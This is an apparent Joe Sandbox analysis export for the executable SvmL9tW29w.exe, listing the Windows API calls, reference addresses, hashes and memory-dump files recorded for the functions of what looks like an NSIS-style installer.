                                                              • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                              • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                              APIs
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,?), ref: 00406586
                                                                • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                              • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                              • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                              • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                              • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                              • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                              • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                              • GetClientRect.USER32(?,?), ref: 00405407
                                                              • GetSystemMetrics.USER32(?), ref: 0040540E
                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                              • ShowWindow.USER32(00000000,?,?,?), ref: 00405496
                                                              • ShowWindow.USER32(?,?), ref: 004054AA
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                              • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                • Part of subcall function 004041B0: SendMessageA.USER32(?,?,?,00403FE0), ref: 004041BE
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                              • ShowWindow.USER32(00000000), ref: 00405554
                                                              • ShowWindow.USER32(?,?), ref: 0040555B
                                                              • ShowWindow.USER32(?), ref: 004055A1
                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                              • CreatePopupMenu.USER32 ref: 004055E6
                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004055FB
                                                              • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                              • OpenClipboard.USER32(00000000), ref: 00405680
                                                              • EmptyClipboard.USER32 ref: 00405686
                                                              • GlobalAlloc.KERNEL32(?,?), ref: 0040568F
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                              • SetClipboardData.USER32(?,00000000), ref: 004056D1
                                                              • CloseClipboard.USER32 ref: 004056D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID:
                                                              • API String ID: 590372296-0
                                                              • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                              • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                              • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                              • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                              • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                              • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                              • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SvmL9tW29w.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040642A
                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,?,?,?), ref: 00406437
                                                                • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\SvmL9tW29w.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040643C
                                                                • Part of subcall function 004063D2: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 0040644C
                                                              • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,?,00429860,?,?,000003FB,?), ref: 00404850
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\tranchet$Call
                                                              • API String ID: 2624150263-675926112
                                                              • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                              • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                              • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                              • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                              • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                              • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                              • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                              • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                              • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                              • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404BF3
                                                              • LoadImageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                              • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                              • ImageList_Create.COMCTL32(?,?,?,?,00000000), ref: 00404C36
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                              • SendMessageA.USER32(?,00001109,?), ref: 00404C60
                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                              • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404C7C
                                                              • DeleteObject.GDI32(00000110), ref: 00404C81
                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                              • SendMessageA.USER32(?,0000110A,?,00000110), ref: 00404D82
                                                                • Part of subcall function 004041B0: SendMessageA.USER32(?,?,?,00403FE0), ref: 004041BE
                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                              • ShowWindow.USER32(?,?), ref: 00404DE2
                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                              • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404F7B
                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                              • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                              • InvalidateRect.USER32(?,00000000,?), ref: 0040511B
                                                              • ShowWindow.USER32(?,00000000), ref: 00405169
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                              • ShowWindow.USER32(00000000), ref: 0040517B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                              • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                              • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                              • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403CE3
                                                              • ShowWindow.USER32(?), ref: 00403D00
                                                              • DestroyWindow.USER32 ref: 00403D14
                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                              • GetDlgItem.USER32(?,?), ref: 00403D51
                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                              • GetDlgItem.USER32(?,?), ref: 00403E1A
                                                              • GetDlgItem.USER32(?,?), ref: 00403E24
                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403E8F
                                                              • GetDlgItem.USER32(?,?), ref: 00403F35
                                                              • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                              • EnableWindow.USER32(?,?), ref: 00403F68
                                                              • EnableWindow.USER32(?,?), ref: 00403F83
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F99
                                                              • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                              • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403FB8
                                                              • SendMessageA.USER32(?,00000401,?,00000000), ref: 00403FCB
                                                              • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                              • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                              • ShowWindow.USER32(?,?), ref: 00404138
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                              • String ID:
                                                              • API String ID: 184305955-0
                                                              • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                              • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                              • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                              • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                              APIs
                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404371
                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004043A3
                                                              • GetSysColor.USER32(?), ref: 004043B4
                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                              • lstrlenA.KERNEL32(?), ref: 004043D5
                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                              • SendMessageA.USER32(00000000), ref: 0040445E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                              • SetCursor.USER32(00000000), ref: 004044E1
                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                              • SetCursor.USER32(00000000), ref: 004044FA
                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404526
                                                              • SendMessageA.USER32(?,00000000,00000000), ref: 0040453A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
